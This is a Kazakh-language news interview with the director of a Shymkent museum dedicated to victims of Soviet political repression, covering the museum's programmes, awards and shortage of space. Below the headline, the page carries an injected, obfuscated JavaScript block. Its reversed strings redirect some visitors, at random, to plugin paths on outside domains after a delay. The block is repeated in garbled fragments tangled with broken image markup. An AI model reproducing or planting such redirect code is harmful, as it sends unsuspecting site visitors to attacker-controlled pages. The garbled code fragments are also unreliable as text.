2024-07-27

Ханбибі Есенқарақызы, ОҚО саяси қуғын-сүргін құрбандарының музейінің директоры: «Атымыз кішкентай болғанмен, затымыз үлкен»

$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tories/main.jpg» style=»margin: 5px; float: right;» alt=»main» src=»images/stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tories/main.jpg» height=»159″ width=»170″ />Үздік атанудың үлгісі көп. Оған облыстағы үздік атанған мекемелердің жұмыс барысымен танысу барысында көз жеткізіп отырмыз.  Шымкенттегі саяси  қуғын-сүргін мұражайына бас сұққанымызда  мүлгіген тыныштықпен бетпе-бет келдік.  Даладағы қайнап жатқан кым-қуыт қарбалас тіршіліктен  тамыр үзіп кеткендей әсер ететін ұядай ғана  тарих жәдігерлерінің тұрағы  демін ішіне тартып тұрған  қабағы қату, сұсы басым  алыптай. Аралап келеміз, Ахмет Байтұсынов, Мағжан Жұмабаев, Жүсіпбек Аймауытов, Сәкен, Бейімбет, Ілияс….. кілең  қазақтың тау тұлғаларының бейнелері. Тақымдай ғана жерге сыйып тұр.  Деректерге үңілген сайын сананы сызғылап  тәуелсіздікке дейінгі  сан қилы ұлт тарихы, ұлылардың тағдыры сәулесін түсіре бастайды. Ұядай ғана дөңгеленген  іші қаракөлеңке, сырты ақ отау  құдіретке айналып, даралана түседі. Сол даралықтың желісіне арқау болған әңгімені  мұражай директоры, қазақтың аяулы ақын қызы –өзінің сөзімен айтсақ, осы  үйдің шырақшысы  Ханбибі Есенқарақызымен бірге өрбіттік.

-Барған жерінде мұражай аралау қалың қазаққа сіңісті болған әдет емес, десе де қонақ кітапшаларыңызға көз салсақ, келім кетім бірқыдыру ел екен. Келушілермен жұмысты үйлестіруде үздік мекеменің әріптестеріне  үлгі етерліктей қандай ерекшеліктері бар?
-Басынан ашып айтайын, жалпы біз  студенттер болмаса оқушыларды қуып келіп шара өткізбейміз. Бұл  тарихпен тікелей байланысы бар мекеме, мұнда  тарихи саяси қуғын-сүргіннің құжаттары сақталады. Қазақ еліне қара шекпенділердің (большевиктер) көрсеткен зорлы-зомбылығы, қолдан жасалған ашаршылық, кәмпеске, 1937-ші жылғы Алаш қайраткерлерінің айдалуы, атылуы, Желтоқсан көтерілісі, міне, мұның бәрі саяси қуғын-сүргін деп аталады. Сол құжаттардың бәрін бір жерге  жинап отырған республикадағы жалғыз мұражай осы  ОҚО саяси қуғын-сүргін құрбандарының мұражайы. Әрине, Астана аумағында, Малиновка деген жерде «Алжир» атты мұражай ашылды. Бірақ бұл мекеме аты айтып тұрғандай бір салалы. Біздің елде  сол жылдары 25 мың адам атылған. Сондықтан бізде ғалымдармен  жүйеленген жұмыс бар, насихат жұмыстары да үздіксіз жүргізіледі. Келушілермен жұмыс істеуде ерекшеліктер бар. Ол осы мұражайда өткізілетін іс-шараның маңызына қатысты. Іс-шаралар жоспар үшін жасалмайды, жан-жақты ізденістен кейін барып, бір-бірімен сабақтастырыла  түзіледі. Жақында ғана 1922-1923 жылдары Ташкент қаласында төте араб әрпімен шыққан «Шолпан» журналын кириллицаға көшіріп кітап  қалпында оқырманымен қайта табыстырдық. Бұл  үш жылғы еңбектің нәтижесі.
Осы Алматы қаласынан іс –сапардан оралған тұсым. Бірқатар архивтерде болдық . Алаш қайраткерлерінің бірқатар еңбектерімен таныстық. «Ақ жол» газетінің 600-дей номері шыққан екен, оны көрдік.  Бүгінгі қоғамның белгілі бір азаматы Әлихан Бәйменов Францияға барғанда Мұстафа Шоқайдың «Жаңа Түркістан», «Жас Түркістан» журналдарын әкелген екен, сол кітаптарды оқырмандармен қауыштырмақ  ойымыз бар. Бізде өткізілетін іс-шаралардың жоспары осылай түзіледі. Қазақ халқы тәуелсіздік жолында 300-ден астам көтеріліс жасаған. Сол көтерілістердің бәрі біздің іс жоспарымызда. Және бұл жұмыстар ұжымдық болғандықтан, оған  оқымыстылар, қоғам қайраткерлері, саяси қуғын-сүргін құрбандарының ұрпақтары, белгілі ғалымдар, біздің қызметкерлер тартылады. Сондықтан, кездесулерге мүмкіндігінше  сол қатысушы азаматтардың барлығын шақыруды мақсат етеміз.
Жүргізіліп жатқан  жұмыстарға  талдау жасай отырып байқағанымыз  бізге көп адам келе алмайды екен. Сондықтан көшпелі көрме ұйымдастыруды қолға алып отырмыз. Деректі фильмдерді сұраныс жасаған, мекемелерге апарып көрсетеміз. Аудандарға да шығып жатырмыз.
-Жалпы сұраныс бар…
-Біз сұраныс болуына жол ашуымыз керек. Бұл мұражайдың өлкетану мұражайларынан бағыт-бағдары бөлек.  Біз туралы «ылғи құжаттар, онда не бар дейсің» деген пікір бар. Біз сол тас қамалды жеңуге ұмтыламыз.
-Нәтиже қандай?
-Студенттер кездесулерде тапжылмай отырады, деректі фильмдерді де демдерін ішіне тартып тамашалайды. Көп нәрсе үйрендік , дегенді жиі естиміз. Бұл  —  нәтиже. Жұмысымыз еленіп, жыл сайын жүлде алып жатамыз.  2009 жылы «Мұражайлар шеруінде» 1-ші орын алдық. Республикалық «Выбор года» байқауында «Золотой Лидер» атандық. Бұдан басқа  көшелердің бұрынғы совхоздың есепшісі, бригадирлерін есімімен аталып кетпеуі, талғамсыздықтың тамыр алып кетпеуіне де  өзімізше үлес қосып жатырмыз. Қазір Шымкентте  саяси қуғын-сүргін құрбандары Құрманбеков Дәуренбек,  Тәңірберген Отарбаев, Апбас Қаламбаев тағы да басқа бірқатар азаматтардың атында көше бар. Тұрған үйлеріне ұрпақтарының  демеушілігімен ескерткіш тақталар орнатыла бастады. Бұл кішкентай ғана сырттан қарағанда біртоға көрінетін мекеменің жетістіктері. Атымыз кішкентай болғанмен, затымыз үлкен.  Мұражай үздік атану үшін үнемі ізденісте үстінде және  халықпен үздіксіз жұмыс істеуі керек. Біздің мұражайға осы Қазақстанда  бар барлық елшіліктердерден делегация өкілдері келіп кетті.  Ағылшын елшілігі тіпті мұражай жайлы кітап шығарды. Бұл әрине , халықтың өткеніне, тарихына құрмет, сондай-ақ біздің жұмыс істей алатынымыздың дәлелі. Генерал Руслан Аушев келіп «мен де репрессияға ұшыраған ұрпақтың ұлымын» деп көзіне жас алған. Бұл мұражайдың адам жанына әсерінің көрінісі. Бұл мұражай халық қасіретінің паспорты сияқты. Саяси қуғын-сүргін құрбандарының ұрпақтары келіп, «әкеміздің құжатын көрсетіңізші, бізге  әкеден осыдан басқа қалған ештеме жоқ» деп қиылып тұрады, моласы да жоқ мәңгілік жай тапқан жері осы дейді. Ең үлкен құрмет-халықтың махаббаты. Мен алдыма үздік болайын деп міндет қойған жан емеспін.  Өзіме жүктелген міндетті адал атқарып жүрмін. Қызмет этикасына қатты көңіл бөлемін. Бұл-мәдени орын.
-Мұражайға өзіңіз айтып отырған кісілерден басқа Мәмбет Қойгелді, Жауғашты Нәбиев, Бейбіт Қойшыбаев, Құлбек Ергөбек, Тұрсын Хазіретәлі,  Асма Қалыбекова басқа да көптеген ғалымдар келіп тұрады екен,  ел тізгінін ұстап жүрген, жергілікті биліктегі азаматтар бас сұға ма, мұражайға?
-Шыны керек, мұражайдың есігін жылына бір рет ашады. 31-ші  мамыр «Саяси қуғын-сүргін құрбандарын еске алу» күнінде қызметтік міндеттерін орындайды, ал рухани азық алу үшін келіп жатқан ешкімді байқамаймын.  Жалпы қазір  өнер мекемелері дарынсыздықпен жұмыс істеп, жүректерін шайлықтырып алған.
— 10 жыл тарихтарыңыз бар, соңғы жылдары бір ғана Түркістанда Нәзір Төреқұлов атындағы және   этнографиялық мұражайлары ашылды, тәжірибе алмасу  жағдайлары қалай?
-Түлкібастағы Тұрар Рысқұлов атындағы, Созақтағы Сұлтанбек Қожанов, Түркістандағы Нәзір Төреқұлов мұражайының  бағдары  бізбен қарайлас. Баста Төреқұлов мұражайын  әдістемемен қамтамасыз еттік.  Қазір сол мұражайды этнографиялық мұражайға қосу керек деп жатыр.  Жалпы біздің облыста осы мұражай саласының жұмысын үйлестіру, бағыт-бағдарына қарай бөлу  жүйеге түсе қоймаған. Олай дейтінім жаңағы айтып өткен мұражайлардың қызметкерлері,  жұмысы әбден  бір арнаға түскен өлкетану мұражайларынан керек нәрсені таба алмаймыз деп жатады. Бізде мұражай ашылады, бірақ қаржысы қаралмайды, штаты жоқ. Түркістандағы былтыр ашылған рухани-этнографиялық орталықтың әлі басшысы жоқ. Осыған қарап отырып біздің басшыларды мұражайдың  бағыт-бағдары , оның халыққа көрсететін қызметі емес, штат-кадр мәселесі толғандыра ма деп қаласың.
Мұражайға қатысты істелуге тиіс, бірақ жүзеге аспай жатқан қандай жұмыстар бар, биылғы жыл сіздер үшін қалай ерекшеленбек?
Біз нағыз қазақпыз. Бүгінгінің киіз үйінде тұрамыз. Ғылыми жұмыспен айналысатынына қарамастан қызметкерлердің бас-басында жеке-жеке  жұмыс бөлмесі жоқ, кездесулерде осы дөңгеленген зал да өтеді, фильмдерде осында көрсетіледі, құжаттар да осында тұр, қысқасы қызметкерлер мен экспонаттар араласып отыра береміз.  Бізде ХІХ ғасырдағы ата-енесі, бала-шағасы, келін-қызы бірге тұратын  қазақ отбасысының тіршілігі бар. Бұл мұражайдағы жәдігерлердің сақталу ерекшелігі, заңдылықтарын білмегендіктен емес әрине,  басқа бос орынның болмағанынан.Фонотека, кітапхана, құжаттарды сақтайтын арнайы орын болса, қанекей.
 Бізде қайтпаймыз, әр әкім ауысқан сайын  жаңа ғимараттың жобасын сызып ұсынамыз.  Біз бастағанда  құрылысқа керек қаржы 20 милионның төңірегінде еді, қазір 80 миллионды еңсереді, бұл мәселенің қанша жылдан бері көтеріліп келе жатқанын енді өзіңіз бағамдай беріңіз. Әзірге осылай мемлекет берген қаржының мұртын ұртқа жалғап отырмыз. Биыл мұражайға 10 жыл толады, бұл репрессияның 75, желтоқсанның 25, Тәуелсіздіктің  20 жылдығымен тұспа-тұс келіп отыр. Қазір үлкен ғылыми- теориялық конференция өткізудің дайындық жұмыстары жүріп жатыр.
Арманыңыз…
«Алаш» тарихы қазір жер-жерде зерттеліп жатыр.  Бірақ зұлмат заманның  шындығын ашып көрсететін құжаттардан қолымызға тигенінен тимегені көп.  Мыңдаған деректі құжат, шаң басқан тарихымыз Өзбекстанда қалды. Қазір біз тамыр-танысты араға салып жұмыс істеп жатырмыз, бұл мемлекеттік дәрежеде  шешілуі керек маңызды мәселе.  Осыларға қарап отырып Алаш қайраткерлеріне деген көзқарас  өз дәрежесінде емес екеніне көз жеткізесің. Менің бір тәтті арманым бар. Алашты зерттеп жүргендер көп болғанымен, жүйе жоқ.  Осында солардың бәрін жүйеге түсіретін ғылыми-зерттеу орталығын ашсақ па деген…
Арманыңыздың орындалуына тілектеспіз, ашық әңгімеңізге рақмет.
                                                      

Бейсенкүл Нарымбетова

Яндекс.Метрика